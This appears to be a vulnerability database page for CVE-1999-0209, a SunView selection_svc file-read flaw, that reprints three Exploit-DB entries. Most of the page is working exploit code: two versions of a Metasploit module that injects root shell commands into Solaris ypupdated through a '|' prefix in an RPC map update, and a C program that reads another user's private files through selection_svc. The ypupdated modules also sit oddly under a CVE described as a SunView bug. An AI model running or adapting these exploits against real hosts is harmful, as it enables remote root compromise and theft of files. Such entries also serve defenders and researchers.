CVE-1999-0209 : Detail

CVE-1999-0209

55.78%V3
Network
1999-09-29 02h00 +00:00
2024-08-01 16h34 +00:00

CVE Descriptions

The SunView (SunTools) selection_svc facility allows remote users to read files.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | | AV:N/AC:L/Au:N/C:P/I:N/A:N | [email protected] |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 16326

Publication date : 2010-07-24 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

```ruby
##
# $Id: ypupdated_exec.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris ypupdated Command Execution',
			'Description'    => %q{
					This exploit targets a weakness in the way the ypupdated RPC
				application uses the command shell when handling a MAP UPDATE
				request. Extra commands may be launched through this command
				shell, which runs as root on the remote host, by passing
				commands in the format '|<command>'.

				Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
				ypupdated is started with the '-i' command-line option.
			},
			'Author'         => [ 'I)ruid <[email protected]>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					['CVE', '1999-0209'],
					['OSVDB', '11517'],
					['BID', '1749'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Dec 12 1994'
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		hostname  = datastore['HOSTNAME']
		program   = 100028
		progver   = 1
		procedure = 1

		print_status('Sending PortMap request for ypupdated program')
		pport = sunrpc_create('udp', program, progver)

		print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
		print_status('Waiting for response...')
		sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
		command = '|' + payload.encoded
		msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
		sunrpc_call(procedure, msg)

		sunrpc_destroy

		print_status('No Errors, appears to have succeeded!')
	rescue ::Rex::Proto::SunRPC::RPCTimeout
		print_error('Warning: ' + $!)
	end

end
```

Exploit Database EDB-ID : 5366

Publication date : 2008-04-03 22h00 +00:00
Author : I)ruid
EDB Verified : Yes

```
                                ____      ____     __    __
                               /    \    /    \   |  |  |  |
                  ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                             |  |      |  |__|  | |  |  |  |
                             |  |  ___ |   __   | |  |  |  |
           ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                               \____/  |__|  |__|  \______/

                         Computer Academic Underground
                             http://www.caughq.org
                                 Exploit Code

===============/========================================================
Exploit ID:     CAU-EX-2008-0001
Release Date:   2008.04.04
Title:          ypupdated_exec.rb
Description:    Solaris ypupdated Command Execution
Tested:         Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes:     Remote, NULL Auth, Elevated Privileges, Metasploit Exploit
URL:            http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email:   I)ruid <druid (@) caughq.org>
===============/========================================================

Description
===========

This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.

Credits
=======

Josh D. <[email protected]> from Avalon Security Research is credited with
originally discovering this vulnerability.

This Metasploit exploit module was modeled after kcope's exploit released
to Milw0rm on 2008.03.20.

References
==========

http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
https://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282

Metasploit
==========

require 'msf/core'

module Msf

class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote

	include Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris ypupdated Command Execution',
			'Description'    => %q{
					This exploit targets a weakness in the way the ypupdated RPC
				application uses the command shell when handling a MAP UPDATE
				request. Extra commands may be launched through this command
				shell, which runs as root on the remote host, by passing
				commands in the format '|<command>'.

				Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
				ypupdated is started with the '-i' command-line option.
			},
			'Author'         => [ 'I)ruid <[email protected]>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4498 $',
			'References'     =>
				[
					['BID', '1749'],
					['CVE', '1999-0209'],
					['OSVDB', '11517'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget'  => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		hostname  = datastore['HOSTNAME']
		program   = 100028
		progver   = 1
		procedure = 1

		print_status 'Sending PortMap request for ypupdated program'
		pport = sunrpc_create('udp', program, progver)

		print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
		print_status 'Waiting for response...'
		sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
		command = '|' + payload.encoded
		msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
		sunrpc_call(procedure, msg)

		sunrpc_destroy

		print_good 'No Errors, appears to have succeeded!'
	rescue ::Rex::Proto::SunRPC::RPCTimeout
		print_status 'Warning: ' + $!
		print_status 'Exploit may or may not have succeeded.'
	end

end
end

# milw0rm.com [2008-04-04]
```

Exploit Database EDB-ID : 19040

Publication date : 1990-08-13 22h00 +00:00
Author : Peter Shipley
EDB Verified : Yes

Source: https://www.securityfocus.com/bid/8/info

On Sun3 and Sun4 systems, a remote system can read any file that is readable to the user running SunView. On the 386i, a remote system can read any file on the workstation running SunView regardless of protections. Note that if root runs Sunview, all files are potentially accessible by a remote system.

Sunview does not kill the selection_svc process when the user quits from Sunview. Thus, unless the process is killed, remote systems can still read files that were readable to the last user that ran Sunview. Under these circumstances, once a user has run Sunview, start using another window system (such as X11), or even log off, but still have files accessible to remote systems.

```c
/* SELN_HOLD_FILE
 * For use where someone has a selection_svc running as them, after an
 * invocation of suntools:
 *
 * % cat their_private_file
 * their_private_file: Permission denied
 * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
 * % ./seln_hold_file their_private_file
 * % get_selection 2
 * < contents of their_private_file >
 * %
 */

#include <stdio.h>
#include <sys/types.h>
#include <suntool/seln.h>

main(argc, argv)
    int argc;
    char *argv[];
{
    Seln_result ret;

    if (argc != 2) {
        (void) fprintf(stderr, "usage: seln_grab file1\n");
        exit(1);
    }
    ret = seln_hold_file(SELN_SECONDARY, argv[1]);
    seln_dump_result(stdout, &ret);
    printf("\n");
}

/*
 * Local variables:
 * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsuntool -lsunwindow"
 * end:
 *
 * Static required because _mem_ops not included in ld.so
 */
```

Products Mentioned

Configuration 0

Sun>>Sunos >> Version 3.5

Sun>>Sunos >> Version 4.0

Sun>>Sunos >> Version 4.0.1

Sun>>Sunos >> Version 4.0.2

Sun>>Sunos >> Version 4.0.3

Sun>>Sunos >> Version 4.1

Sun>>Sunos >> Version 4.1.1

References

http://www.securityfocus.com/bid/8
Tags : vdb-entry, x_refsource_BID